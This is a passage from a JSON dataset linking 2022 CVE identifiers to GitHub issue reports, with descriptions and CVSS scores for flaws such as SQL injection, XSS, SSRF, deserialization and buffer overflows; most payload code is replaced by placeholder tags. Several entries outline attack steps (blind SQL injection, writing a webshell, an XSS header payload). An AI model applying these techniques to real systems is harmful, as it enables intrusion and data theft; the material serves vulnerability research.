  82689. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82690. "severity": "CRITICAL",
  82691. "baseScore": 9.8,
  82692. "impactScore": 5.9,
  82693. "exploitabilityScore": 3.9
  82694. },
  82695. {
  82696. "CVE_ID": "CVE-2022-29309",
  82697. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/43",
  82698. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/43",
  82699. "Repo_new": "wangl1989/mysiteforme",
  82700. "Issue_Created_At": "2022-04-06T12:00:25Z",
  82701. "description": "An SSRF vulnerability exists in the system. The problem code: the URL parameter is attacker-controllable FILETAG Vulnerability validation FILETAG The DNS logging platform received the request. Procedure FILETAG",
  82702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82703. "severity": "HIGH",
  82704. "baseScore": 7.5,
  82705. "impactScore": 3.6,
  82706. "exploitabilityScore": 3.9
  82707. },
  82708. {
  82709. "CVE_ID": "CVE-2022-29334",
  82710. "Issue_Url_old": "https://github.com/SiJiDo/H/issues/27",
  82711. "Issue_Url_new": "https://github.com/sijido/h/issues/27",
  82712. "Repo_new": "sijido/h",
  82713. "Issue_Created_At": "2022-04-11T05:03:53Z",
  82714. "description": "\u56fa\u5b9a\u7684cookie NUMBERTAG APITAG FILETAG NUMBERTAG H\u7cfb\u7edf\u7684target_ip\uff0c\u8bbf\u95ee URLTAG \uff0c\u7ed3\u679c\u5982\u56fe\uff1a FILETAG NUMBERTAG burpsuite\u62e6\u622a URLTAG APITAG FILETAG \u54cd\u5e94\u754c\u9762\u5982\u4e0b\u6240\u793a\uff08\u5373\u53ef\u6210\u529f\u767b\u5f55\uff09 FILETAG",
  82715. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82716. "severity": "CRITICAL",
  82717. "baseScore": 9.8,
  82718. "impactScore": 5.9,
  82719. "exploitabilityScore": 3.9
  82720. },
  82721. {
  82722. "CVE_ID": "CVE-2022-29339",
  82723. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2165",
  82724. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2165",
  82725. "Repo_new": "gpac/gpac",
  82726. "Issue_Created_At": "2022-04-08T08:28:19Z",
  82727. "description": "Assertion failed in APITAG APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG",
  82728. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82729. "severity": "HIGH",
  82730. "baseScore": 7.5,
  82731. "impactScore": 3.6,
  82732. "exploitabilityScore": 3.9
  82733. },
  82734. {
  82735. "CVE_ID": "CVE-2022-29340",
  82736. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2163",
  82737. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2163",
  82738. "Repo_new": "gpac/gpac",
  82739. "Issue_Created_At": "2022-04-01T12:17:54Z",
  82740. "description": "NULL Pointer Dereference still exists in APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG When APITAG and APITAG , APITAG will return APITAG (i.e NUMBERTAG at line NUMBERTAG of box_funcs.c. URLTAG This will cause APITAG to be set to NULL (in APITAG and the return value APITAG will be passed to the upper function ( in APITAG URLTAG The program now executes the empty if block when APITAG ( in APITAG NUMBERTAG and later dereferences the null pointer in line NUMBERTAG of isom_intern.c. URLTAG Note that although the crash path is the same as in issue NUMBERTAG their root cause is different.",
  82741. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82742. "severity": "HIGH",
  82743. "baseScore": 7.5,
  82744. "impactScore": 3.6,
  82745. "exploitabilityScore": 3.9
  82746. },
  82747. {
  82748. "CVE_ID": "CVE-2022-29349",
  82749. "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/347",
  82750. "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/347",
  82751. "Repo_new": "kekingcn/kkfileview",
  82752. "Issue_Created_At": "2022-04-13T08:37:22Z",
  82753. "description": "XSS Vulnerability. APITAG XSS Vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has an XSS vulnerability, which may lead to the leakage of website cookies. \u6f0f\u6d1e\u4f4d\u7f6e vulnerable code location APITAG APITAG The vulnerable code is located at line NUMBERTAG in APITAG . The url parameter is user controllable, and it is output to the page without filtering special characters ERRORTAG APITAG APITAG URLTAG The version of the official demo site is NUMBERTAG Visit URLTAG and the concept is proved. APITAG (the url parameter value needs to be base NUMBERTAG encoded and URL encoded.)",
  82754. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82755. "severity": "MEDIUM",
  82756. "baseScore": 6.1,
  82757. "impactScore": 2.7,
  82758. "exploitabilityScore": 2.8
  82759. },
  82760. {
  82761. "CVE_ID": "CVE-2022-29361",
  82762. "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/2420",
  82763. "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/2420",
  82764. "Repo_new": "pallets/werkzeug",
  82765. "Issue_Created_At": "2022-05-25T14:07:43Z",
  82766. "description": "Question regarding CVETAG . I have a question regarding the HTTP request smuggling vulnerability CVETAG CVETAG in werkzeug. The resources provided at mitre seem not to be pointing to a fix. I tried to find a fix but was unsuccessful. Would it be possible for you to link to a fixing commit or provide a security advisory here? Thanks a lot!",
  82767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82768. "severity": "CRITICAL",
  82769. "baseScore": 9.8,
  82770. "impactScore": 5.9,
  82771. "exploitabilityScore": 3.9
  82772. },
  82773. {
  82774. "CVE_ID": "CVE-2022-29363",
  82775. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/12",
  82776. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/12",
  82777. "Repo_new": "qinggan/phpok",
  82778. "Issue_Created_At": "2022-04-14T07:37:26Z",
  82779. "description": "phpok NUMBERTAG has a deserialization vulnerability, and an attacker can obtain a webshell by writing arbitrary files. The update method in the login controller of the admin module calls the decode method, and the decode function calls unserialize. poc: APITAG analyze\uff1a APITAG APITAG For this payload, we can use the cache class, whose __destruct method calls the save method, and the save method can write the webshell\uff1a APITAG The exit here can be bypassed through a PHP stream wrapper (pseudo-protocol)\uff1a APITAG php file successfully written and executed\uff1a APITAG When executing the following file to generate the attack chain, put FILETAG in the same directory: ERRORTAG",
  82780. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82781. "severity": "CRITICAL",
  82782. "baseScore": 9.8,
  82783. "impactScore": 5.9,
  82784. "exploitabilityScore": 3.9
  82785. },
  82786. {
  82787. "CVE_ID": "CVE-2022-29368",
  82788. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/896",
  82789. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/896",
  82790. "Repo_new": "moddable-opensource/moddable",
  82791. "Issue_Created_At": "2022-04-08T06:18:36Z",
  82792. "description": "Out of bounds Read in APITAG Environment Build environment: Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Jan NUMBERTAG UTC NUMBERTAG APITAG Target device: sdk Commit: APITAG Proof of concept FILETAG ERRORTAG Analysis In file: PATHTAG CODETAG Since the offset in NUMBERTAG is controlled by the attacker, this issue yields an arbitrary memory read primitive. ERRORTAG In this case, rax is an out of bounds read index into the APITAG , which has the value of APITAG . ASAN Stack dump ERRORTAG Credit P1umer( APITAG and Q1IQ( APITAG",
  82793. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  82794. "severity": "HIGH",
  82795. "baseScore": 7.1,
  82796. "impactScore": 5.2,
  82797. "exploitabilityScore": 1.8
  82798. },
  82799. {
  82800. "CVE_ID": "CVE-2022-29369",
  82801. "Issue_Url_old": "https://github.com/nginx/njs/issues/467",
  82802. "Issue_Url_new": "https://github.com/nginx/njs/issues/467",
  82803. "Repo_new": "nginx/njs",
  82804. "Issue_Created_At": "2022-02-15T08:25:51Z",
  82805. "description": "SEGV APITAG in njs_lvlhsh_bucket_find. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  82806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82807. "severity": "HIGH",
  82808. "baseScore": 7.5,
  82809. "impactScore": 3.6,
  82810. "exploitabilityScore": 3.9
  82811. },
  82812. {
  82813. "CVE_ID": "CVE-2022-29379",
  82814. "Issue_Url_old": "https://github.com/nginx/njs/issues/493",
  82815. "Issue_Url_new": "https://github.com/nginx/njs/issues/493",
  82816. "Repo_new": "nginx/njs",
  82817. "Issue_Created_At": "2022-04-13T01:20:16Z",
  82818. "description": "APITAG njs NUMBERTAG was discovered to contain a stack buffer overflow bug in njs_default_module_loader. Description njs NUMBERTAG used in NGINX, was discovered to contain a stack buffer overflow in njs_default_module_loader ( PATHTAG ) ENV Version NUMBERTAG Commit : APITAG OS : Ubuntu NUMBERTAG Configure : CC=clang NUMBERTAG configure address sanitizer=YES BT ERRORTAG Fixed The issue was fixed in URLTAG FYI, the problem was introduced in commit URLTAG , which had not been released yet.",
  82819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82820. "severity": "CRITICAL",
  82821. "baseScore": 9.8,
  82822. "impactScore": 5.9,
  82823. "exploitabilityScore": 3.9
  82824. },
  82825. {
  82826. "CVE_ID": "CVE-2022-29379",
  82827. "Issue_Url_old": "https://github.com/nginx/njs/issues/491",
  82828. "Issue_Url_new": "https://github.com/nginx/njs/issues/491",
  82829. "Repo_new": "nginx/njs",
  82830. "Issue_Created_At": "2022-04-08T08:53:47Z",
  82831. "description": "Found a possible security concern. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  82832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82833. "severity": "CRITICAL",
  82834. "baseScore": 9.8,
  82835. "impactScore": 5.9,
  82836. "exploitabilityScore": 3.9
  82837. },
  82838. {
  82839. "CVE_ID": "CVE-2022-29498",
  82840. "Issue_Url_old": "https://github.com/ankane/blazer/issues/392",
  82841. "Issue_Url_new": "https://github.com/ankane/blazer/issues/392",
  82842. "Repo_new": "ankane/blazer",
  82843. "Issue_Created_At": "2022-04-20T21:38:03Z",
  82844. "description": "SQL injection for certain queries with variables. Blazer queries with variables are vulnerable to SQL injection in certain cases. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact For some queries, specific variable values can modify the query rather than just the variable. This can occur if NUMBERTAG the query's data source uses different escaping than the Rails database OR NUMBERTAG the query has a variable inside a string literal Since Blazer is designed to run arbitrary queries, the impact will typically be low. Users cannot run any queries they could not have already run. However, an attacker could get a user to run a query they would not have normally run. If the data source has write permissions, this could include modifying data in some cases. Mitigation All users running an affected release should upgrade when possible. Blazer now uses parameterized queries or prepared statements for variables for a number of data sources, which mitigates the issue for their queries. Escaping has been fixed for the other data sources, but it's still possible for users to write queries that can't be escaped correctly, like APITAG . For this reason, data sources should use credentials with read only permissions. Credit Thanks to Al Chou for reporting the escaping issue.",
  82845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  82846. "severity": "HIGH",
  82847. "baseScore": 7.5,
  82848. "impactScore": 3.6,
  82849. "exploitabilityScore": 3.9
  82850. },
  82851. {
  82852. "CVE_ID": "CVE-2022-29526",
  82853. "Issue_Url_old": "https://github.com/golang/go/issues/52313",
  82854. "Issue_Url_new": "https://github.com/golang/go/issues/52313",
  82855. "Repo_new": "golang/go",
  82856. "Issue_Created_At": "2022-04-12T20:16:17Z",
  82857. "description": "syscall: Faccessat checks wrong group. The APITAG function checks whether the calling process can access a file. Faccessat contains a bug where it checks a file's group permission bits if the process's user is a member of the process's group rather than a member of the file's group. URLTAG CODETAG Since a process's user is usually a member of the process's group, this causes Faccessat to usually check a file's group permissions even if the process's user is not a member of the file's group. Thanks to MENTIONTAG for reporting this.",
  82858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  82859. "severity": "MEDIUM",
  82860. "baseScore": 5.3,
  82861. "impactScore": 1.4,
  82862. "exploitabilityScore": 3.9
  82863. },
  82864. {
  82865. "CVE_ID": "CVE-2022-29537",
  82866. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2173",
  82867. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2173",
  82868. "Repo_new": "gpac/gpac",
  82869. "Issue_Created_At": "2022-04-16T08:01:38Z",
  82870. "description": "FILETAG POC FILETAG",
  82871. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82872. "severity": "MEDIUM",
  82873. "baseScore": 5.5,
  82874. "impactScore": 3.6,
  82875. "exploitabilityScore": 1.8
  82876. },
  82877. {
  82878. "CVE_ID": "CVE-2022-29583",
  82879. "Issue_Url_old": "https://github.com/kardianos/service/issues/289",
  82880. "Issue_Url_new": "https://github.com/kardianos/service/issues/289",
  82881. "Repo_new": "kardianos/service",
  82882. "Issue_Created_At": "2021-08-04T08:33:58Z",
  82883. "description": "Windows service: unquoted service path can allow for privilege escalation. Hello! We use Telegraf URLTAG (which depend on this library) and our vulnerability scanner notifies us of the following vulnerability with the telegraf service: Windows Unquoted Search Path or Element can allow local privilege escalation URLTAG I did some brief digging around and I think the problem boils down to this line: URLTAG Here you take the path to the executing program (if I understood correctly) and later use it when you install the service. Doing this without adding quotes to the path means that the unquoted service path issue comes into effect. You should be able to simply add quotes to the path, and in doing to solve the issue at hand.",
  82884. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82885. "severity": "HIGH",
  82886. "baseScore": 7.8,
  82887. "impactScore": 5.9,
  82888. "exploitabilityScore": 1.8
  82889. },
  82890. {
  82891. "CVE_ID": "CVE-2022-29622",
  82892. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/856",
  82893. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/856",
  82894. "Repo_new": "node-formidable/formidable",
  82895. "Issue_Created_At": "2022-05-19T05:55:03Z",
  82896. "description": "Vulnerability CVETAG is reported by Whitesource. URLTAG",
  82897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82898. "severity": "CRITICAL",
  82899. "baseScore": 9.8,
  82900. "impactScore": 5.9,
  82901. "exploitabilityScore": 3.9
  82902. },
  82903. {
  82904. "CVE_ID": "CVE-2022-29622",
  82905. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/862",
  82906. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/862",
  82907. "Repo_new": "node-formidable/formidable",
  82908. "Issue_Created_At": "2022-05-27T14:51:41Z",
  82909. "description": "Filename filtering is inappropriate. I came across your filename handling and filtering with the CVETAG and this issue URLTAG First you got blamed also inappropriate by this CVETAG whoever is responsible for publishing this without correct approval. Filenames of forms can have html tags and js like text, like any other form inputs and it is the responsibility of the lib user to handle this, because only he/she knows where this filename is used and what is a safety risk. All this filtering and replacement makes it worse, because the original filename of upload gets lost. Why I've opened this issue: Now your current code of __formidable__ has some filename filtering which is __dysfunctional__. This is an example you can put in e.g. URLTAG The code is from your current master FILETAG and I've added some asserts to show the problem. ERRORTAG",
  82910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82911. "severity": "CRITICAL",
  82912. "baseScore": 9.8,
  82913. "impactScore": 5.9,
  82914. "exploitabilityScore": 3.9
  82915. },
  82916. {
  82917. "CVE_ID": "CVE-2022-29631",
  82918. "Issue_Url_old": "https://github.com/oblac/jodd-http/issues/9",
  82919. "Issue_Url_new": "https://github.com/oblac/jodd-http/issues/9",
  82920. "Repo_new": "oblac/jodd-http",
  82921. "Issue_Created_At": "2022-04-17T16:59:28Z",
  82922. "description": "CRLF injection vulnerability in jodd http. CRLF injection vulnerability in jodd http CRLF injection vulnerability in APITAG and APITAG in APITAG version NUMBERTAG all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL . Proof of concept \uff1a CODETAG CODETAG run the poc , listen on APITAG FILETAG details \uff1a in APITAG when processing path \uff0c APITAG is called \uff0cand it is allowed to inject APITAG in query string and path and fragment . in APITAG , APITAG is called , and trying to build the http request payload . However , the path , query string , fragment and other components are just appended insecurely , which leads to the crlf injection . suggestion : it is recommended to urlencode the invalid characters when constructing the http request payload .",
  82923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  82924. "severity": "HIGH",
  82925. "baseScore": 7.5,
  82926. "impactScore": 3.6,
  82927. "exploitabilityScore": 3.9
  82928. },
  82929. {
  82930. "CVE_ID": "CVE-2022-29632",
  82931. "Issue_Url_old": "https://github.com/roncoo/roncoo-education/issues/16",
  82932. "Issue_Url_new": "https://github.com/roncoo/roncoo-education/issues/16",
  82933. "Repo_new": "roncoo/roncoo-education",
  82934. "Issue_Created_At": "2022-04-18T03:18:50Z",
  82935. "description": "There is a File upload vulnerability exists in roncoo education. APITAG description] File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix. APITAG Type] File upload vulnerability APITAG of Product] URLTAG APITAG Product Code Base NUMBERTAG RELEASE APITAG Component] ERRORTAG APITAG proof] Use the following HTML file to initiate the upload request CODETAG Upload any file, here my file source code is CODETAG The server returns the following data APITAG APITAG APITAG code] APITAG APITAG",
  82936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82937. "severity": "CRITICAL",
  82938. "baseScore": 9.8,
  82939. "impactScore": 5.9,
  82940. "exploitabilityScore": 3.9
  82941. },
  82942. {
  82943. "CVE_ID": "CVE-2022-29637",
  82944. "Issue_Url_old": "https://github.com/mindoc-org/mindoc/issues/788",
  82945. "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/788",
  82946. "Repo_new": "mindoc-org/mindoc",
  82947. "Issue_Created_At": "2022-04-24T13:42:02Z",
  82948. "description": "There is a directory traversal vulnerability in mindoc. \u8bf7\u6309\u7167\u4e00\u4e0b\u683c\u5f0f\u63d0\u4ea4issue NUMBERTAG APITAG APITAG NUMBERTAG beta NUMBERTAG Centos NUMBERTAG zip NUMBERTAG FILETAG NUMBERTAG APITAG FILETAG APITAG After clicking upload, he will create a new APITAG in the root directory of the server APITAG APITAG code] APITAG APITAG APITAG Bingan",
  82949. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  82950. "severity": "HIGH",
  82951. "baseScore": 7.8,
  82952. "impactScore": 5.9,
  82953. "exploitabilityScore": 1.8
  82954. },
  82955. {
  82956. "CVE_ID": "CVE-2022-29648",
  82957. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/34",
  82958. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/34",
  82959. "Repo_new": "jflyfox/jfinal_cms",
  82960. "Issue_Created_At": "2022-04-14T02:59:27Z",
  82961. "description": "There is an xss vulnerability of HTTP header injection storage in jfinal_cms NUMBERTAG FILETAG The contents of the grab bag are as follows: FILETAG Add an X Forwarded For here and enter payload ( APITAG APITAG alert (\"xss\") APITAG ) FILETAG Then log in with the background administrator account to trigger the storage XSS. FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
  82962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82963. "severity": "MEDIUM",
  82964. "baseScore": 5.4,
  82965. "impactScore": 2.7,
  82966. "exploitabilityScore": 2.3
  82967. },
  82968. {
  82969. "CVE_ID": "CVE-2022-29660",
  82970. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/25",
  82971. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/25",
  82972. "Repo_new": "chshcms/cscms",
  82973. "Issue_Created_At": "2022-04-19T02:48:07Z",
  82974. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG Then construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exists",
  82975. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82976. "severity": "CRITICAL",
  82977. "baseScore": 9.8,
  82978. "impactScore": 5.9,
  82979. "exploitabilityScore": 3.9
  82980. },
  82981. {
  82982. "CVE_ID": "CVE-2022-29661",
  82983. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/21",
  82984. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/21",
  82985. "Repo_new": "chshcms/cscms",
  82986. "Issue_Created_At": "2022-04-19T02:28:00Z",
  82987. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG CODETAG FILETAG Delete this album to the recycle bin FILETAG When deleting the album in the recycle bin, construct malicious statements to realize SQL injection CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG so construct payload to Blasting database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
  82988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82989. "severity": "HIGH",
  82990. "baseScore": 7.2,
  82991. "impactScore": 5.9,
  82992. "exploitabilityScore": 1.2
  82993. },
  82994. {
  82995. "CVE_ID": "CVE-2022-29662",
  82996. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/17",
  82997. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/17",
  82998. "Repo_new": "chshcms/cscms",
  82999. "Issue_Created_At": "2022-04-19T01:59:58Z",
  83000. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Administrators need to add another news after logging in.the following data package is constructed FILETAG CODETAG FILETAG Constructing malicious packets to implement SQL injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code News::del FILETAG",
  83001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83002. "severity": "HIGH",
  83003. "baseScore": 7.2,
  83004. "impactScore": 5.9,
  83005. "exploitabilityScore": 1.2
  83006. },
  83007. {
  83008. "CVE_ID": "CVE-2022-29663",
  83009. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/22",
  83010. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/22",
  83011. "Repo_new": "chshcms/cscms",
  83012. "Issue_Created_At": "2022-04-19T02:34:04Z",
  83013. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG Then delete the APITAG restoring the album in the recycle bin, construct malicious statements to realize SQL injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
  83014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83015. "severity": "HIGH",
  83016. "baseScore": 7.2,
  83017. "impactScore": 5.9,
  83018. "exploitabilityScore": 1.2
  83019. },
  83020. {
  83021. "CVE_ID": "CVE-2022-29664",
  83022. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/23",
  83023. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/23",
  83024. "Repo_new": "chshcms/cscms",
  83025. "Issue_Created_At": "2022-04-19T02:39:42Z",
  83026. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG There is an injection when adding an album to save, and the injection point is ID CODETAG FILETAG construct payload to blast database APITAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exists FILETAG",
  83027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83028. "severity": "HIGH",
  83029. "baseScore": 8.8,
  83030. "impactScore": 5.9,
  83031. "exploitabilityScore": 2.8
  83032. },
  83033. {
  83034. "CVE_ID": "CVE-2022-29665",
  83035. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/19",
  83036. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/19",
  83037. "Repo_new": "chshcms/cscms",
  83038. "Issue_Created_At": "2022-04-19T02:15:35Z",
  83039. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details Add a news topic after the administrator logs in FILETAG CODETAG FILETAG When deleting news topics, malicious statements can be constructed to realize SQL injection FILETAG CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds,so construct payload to Blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the Injection vulnerability exists",
  83040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83041. "severity": "HIGH",
  83042. "baseScore": 7.2,
  83043. "impactScore": 5.9,
  83044. "exploitabilityScore": 1.2
  83045. },
  83046. {
  83047. "CVE_ID": "CVE-2022-29666",
  83048. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/24",
  83049. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/24",
  83050. "Repo_new": "chshcms/cscms",
  83051. "Issue_Created_At": "2022-04-19T02:43:26Z",
  83052. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG The administrator needs to add a picture after logging in FILETAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83054. "severity": "HIGH",
  83055. "baseScore": 7.2,
  83056. "impactScore": 5.9,
  83057. "exploitabilityScore": 1.2
  83058. },
  83059. {
  83060. "CVE_ID": "CVE-2022-29667",
  83061. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/26",
  83062. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/26",
  83063. "Repo_new": "chshcms/cscms",
  83064. "Issue_Created_At": "2022-04-19T02:53:31Z",
  83065. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG Injection occurs when restoring deleted photos from the trash CODETAG FILETAG Discovery success makes the server APITAG APITAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83067. "severity": "HIGH",
  83068. "baseScore": 8.8,
  83069. "impactScore": 5.9,
  83070. "exploitabilityScore": 2.8
  83071. },
  83072. {
  83073. "CVE_ID": "CVE-2022-29669",
  83074. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/20",
  83075. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/20",
  83076. "Repo_new": "chshcms/cscms",
  83077. "Issue_Created_At": "2022-04-19T02:21:42Z",
  83078. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details Injection vulnerability exists in APITAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83080. "severity": "HIGH",
  83081. "baseScore": 8.8,
  83082. "impactScore": 5.9,
  83083. "exploitabilityScore": 2.8
  83084. },
  83085. {
  83086. "CVE_ID": "CVE-2022-29680",
  83087. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/31",
  83088. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/31",
  83089. "Repo_new": "chshcms/cscms",
  83090. "Issue_Created_At": "2022-04-20T01:27:59Z",
